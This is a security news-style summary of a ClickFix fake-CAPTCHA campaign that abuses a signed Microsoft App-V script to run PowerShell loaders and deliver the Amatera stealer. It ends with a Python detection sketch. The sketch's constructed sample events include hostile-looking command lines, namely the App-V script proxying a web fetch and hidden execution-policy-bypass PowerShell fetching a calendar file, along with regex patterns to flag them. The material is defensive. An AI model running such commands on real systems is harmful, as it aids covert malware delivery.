Cybersecurity researchers have detailed a new campaign that blends ClickFix-style fake CAPTCHAs with a signed Microsoft App-V script to deliver an information stealer called Amatera. The attackers proxy PowerShell execution through a trusted Microsoft component by abusing SyncAppvPublishingServer[.]vbs, a signed VBScript, a living-off-the-land technique that helps the chain evade detection.
The infection chain starts with a fake CAPTCHA prompt that tricks users into running a malicious command, then uses an in-memory PowerShell loader that fetches configuration from a Google Calendar ICS file and proceeds through multiple loader stages to decrypt and run a PowerShell payload before launching the Amatera Stealer.
Researchers note the approach is highly evasive: the stages are chained so that execution only progresses as intended, and externalising configuration via a public calendar lets the operators rotate infrastructure quickly. The campaign forms part of the broader ClickFix ecosystem, which Microsoft has observed accounting for 47% of attacks, with attackers also leveraging trusted tools and third-party services to hinder automated analysis.
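The chain described above leaves a recognisable footprint in process-creation telemetry: the App-V script being handed more than a bare mode argument, PowerShell launched hidden or with execution policy bypassed, and a fetch of a Google Calendar `.ics` file. The following is an added detection sketch written for this article (not code from the researchers or from the campaign); the events are constructed samples loosely modelled on Sysmon Event ID 1 fields, the calendar URL is a placeholder, and the rule names and thresholds are the author's own assumptions.

```python
import re

# Constructed process-creation events (parent image, image, command line).
# These are invented samples for the demo, not telemetry from the campaign.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n; Invoke-WebRequest https://calendar.google.com/calendar/ical/PLACEHOLDER/public/basic.ics"'},
    {"parent": r"C:\Windows\System32\svchost.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe C:\Windows\System32\SyncAppvPublishingServer.vbs "n"'},  # legitimate App-V sync
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -ep bypass -c "iwr https://calendar.google.com/calendar/ical/PLACEHOLDER/public/basic.ics"'},
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Get-Date"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Get-ChildItem C:\Users"'},  # benign admin use
]

APPV_SCRIPT = re.compile(r"syncappvpublishingserver\.vbs", re.I)
# Legitimate use passes a bare mode token; a statement separator, pipe, variable or
# subexpression after it means the script is being used as a PowerShell proxy.
APPV_INJECT = re.compile(r'syncappvpublishingserver\.vbs\s+"?[^";|$(]*[;|$(]', re.I)
PS_IMAGE = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
PS_HIDDEN_BYPASS = re.compile(r"-(w(indowstyle)?\s+hidden|e(xecutionpolicy|p)\s+bypass)", re.I)
CALENDAR_ICS = re.compile(r"calendar\.google\.com/\S*\.ics", re.I)
SCRIPT_HOSTS = re.compile(r"\\[cw]script\.exe$", re.I)

def detect(event):
    """Return the names of the rules that fire on one event (empty list if none)."""
    hits = []
    cmd = event["cmdline"]
    if APPV_SCRIPT.search(cmd) and APPV_INJECT.search(cmd):
        hits.append("appv_script_proxy")
    is_ps = bool(PS_IMAGE.search(event["image"]))
    if is_ps and PS_HIDDEN_BYPASS.search(cmd):
        hits.append("powershell_hidden_or_bypass")
    if CALENDAR_ICS.search(cmd):
        hits.append("calendar_ics_fetch")
    if is_ps and SCRIPT_HOSTS.search(event["parent"]):  # PowerShell spawned by wscript/cscript
        hits.append("powershell_from_script_host")
    return hits

def scan(events):
    """Map event index -> fired rules, keeping only events that fired at least one rule."""
    return {i: r for i, r in ((i, detect(e)) for i, e in enumerate(events)) if r}

if __name__ == "__main__":
    for i, rules in scan(SAMPLE_EVENTS).items():
        print(i, rules, SAMPLE_EVENTS[i]["cmdline"][:80])
```

The calendar rule alone is not a verdict, since `.ics` downloads also occur in legitimate scripts; it is the combination with the App-V proxy or hidden/bypass flags that should page someone.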